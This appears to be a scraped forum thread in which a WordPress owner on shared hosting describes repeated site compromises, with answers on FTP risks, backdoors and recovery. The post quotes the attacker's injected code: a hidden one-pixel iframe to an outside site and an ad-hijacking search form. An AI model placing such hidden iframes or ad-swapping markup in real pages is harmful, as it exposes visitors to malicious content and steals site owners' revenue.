Website Security – Steps to Take After Being Hacked

ftpgodaddyhackinghostingpassword

Final Update:

Things have been peaceful for the past few weeks and taught me much more about website security and risks. Here's my version of story –

I was using an older version of wordpress and probably this person caught me from google. I think it was a script attack. Its difficult to say how and when the security was actually compromised, it came to my notice on Nov 5, 2009. While I took some safety measures at that time (described below) but there's always a possibility that I missed out rechanging wordpress passwords when I formatted my work computer.

Now I've deleted all unrequired php scripts from hosting, made administration part accessible only to my IP, blocked a particular IP range that belongs to vietnam. Daily backups and other stuff. The thing is that there are so many variables involved and its too difficult to keep track of each and everything. Main lesson is be prepared for it. 🙂

I'm on a shared hosting plan by GoDaddy and run a WordPress website. My website was hacked for the first time on Nov 5, 2009. At that time, the hacker replaced my ads with his own. I thought it happened because of my laziness with security, but I was so wrong.

I formatted my computer and setup everything again. Replaced ESET NOD32 with Microsoft Security Essentials. Upgraded to the latest version of WordPress. Changed all passwords. Setup a new database. And other security related stuff I read here and there. Things worked well for a while until my site was hacked again today.

Last time, the guy played with a lot of files and specifically changed footer.php and all ads related files. But this time he just went to the right place and replaced with following code –

<IFRAME height=1 src="http://blackberryrss.com/check.html" frameBorder=0 width=1></IFRAME>

<form action="http://www.google.com/cse" id="cse-search-box">
  <div>
    <input type="hidden" name="cx" value="partner-pub-2815780429722377:hhm6d0-6wfw" />

    <input type="hidden" name="ie" value="ISO-8859-1" />
    <input type="text" name="q" size="31" />
    <input type="submit" name="sa" value="Search" />
  </div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script>

Looks like that person isn't interested in manipulating database etc. but just place code and make quick money. Godaddy forwarded my ftp logs and there was an unauthorized access from IP – 117.2.56.31. This IP belongs to Vietnam and also http://blackberryrss.com has some connection to Vietnam.

There is no SSH access to my account and I connect to FTP using FireFTP. This was GoDaddy's response last time –

Upon reviewing your account we have
found your FTP account has been
compromised either due to malware on
your local computer or a weak
FTP/Hosting password.

But I had changed all passwords, deleted accounts etc. but nothing seems to work. I'm clueless at the moment. Please tell me what to do? How can I prevent unauthorized access to my account??????

Additional Details:

Strength of password is just Strong but not Best.
I personally use Windows XP SP3, Windows Firewall etc. After first attack I've learned to work using a user account and avoid administrator account.
When I see FTP logs for the first attack, its quite clear that person is manually doing all of this.

Best Answer

Keep in mind FTP sends your password in CLEAR TEXT. So the potential for compromise is definitely there.

Another thing to consider, is your FTP password UNIQUE to your hosting? Are you sure you're not using it ANYWHERE else? No other accounts, websites, etc?

How secure is your EMAIL password? I've been involved in cases where the "weak link" was actually the EMAIL password and the culprit was just sending "forgot passwords" to the email and deleting the evidence from the email box while everyone was too busy focusing on the compromised server to notice.

Just a few things that came to mind... some other things of course would be a social engineering approach with your ISP or some software vulnerability on your server or one of the packages your hosting.

There's more (obviously) but those are typically the "usual suspects".

UPDATE:

Based on this new information (that the hacker is not using FTP to change your files) I can only assume that the most likely cause is probably an unsecured web app.

That's not the ONLY thing it can be but in cases like this is the most likely.

Another thing to consider (and check for) is if he left himself some sort of "back door" to your app. I seem to recall you mentioning before that your ISP said he came in via FTP. Is it possible he came in via FTP the first time and left himself a back door?

Also, its a shot in the dark, but I have personally witnessed compromised boxes where a hacker only came in ONE time but left a cron job that kept changing files and other various evil. Is it possible that the hacker DIDN'T come back and you're dealing with an automated script? Just something to check if you feel you've exhausted all other possibilities.

Finally, do you have access to your web logs, system logs, etc? If so, what do they say? Do they reveal any clues?

Related Solutions

Website Security – How Could My Website Be Hacked

Restore from known-good backups. Otherwise, you may have to wipe and reinstall. A good rule of thumb is to NEVER trust a system once it's been compromised. There's too much chance that binaries have been replaced to hide a payload or backdoor.

As for the how, it may have been an SQL injection attack. Or some other way in. You were running everything with the latest patches?

This link is from a cache of an apparent hack into twit.tv (I think it's This Week In Tech). If you google the phrase you'll get a bunch of hits. Any time there's a scripted mass attack out there you're going to find chatter on different forums discussing it.

Again...DON'T TRUST THE SYSTEM. You probably should wipe and reinstall then restore database information from a previous backup...that's the safest route.

Php – Got Hacked. Want to understand how

First of all chmod 744 its NOT what you want. The point of chmod is to revoke access to other accounts on the system. Chmod 700 is far more secure than chmod 744. However Apache only needs the execute bit to run your php application.

chmod 500 -R /your/webroot/

chown www-data:www-data -R /your/webroot/

www-data is commonly used as Apache's account which is used to execute the php. You could also run this command to see the user account:

`<?php
print system("whoami");
?>`

FTP is horribly insecure and it's very likely that you were hacked from this method. Using FTP you can make files writable, and then infect them again. Make sure you run an anti-virus on all machines with FTP access. There are viruses that sniff the local traffic for FTP user-names and passwords and then login and infect the files. If you care about security you'll use SFTP, which encrypts everything. Sending source code and passwords over the wire in clear text is total madness.

Another possibility is that you are using an old library or application. Visit the software vendor's site and make sure you are running the latest version.

Best Answer

Related Solutions

Website Security – How Could My Website Be Hacked

Php – Got Hacked. Want to understand how

Related Topic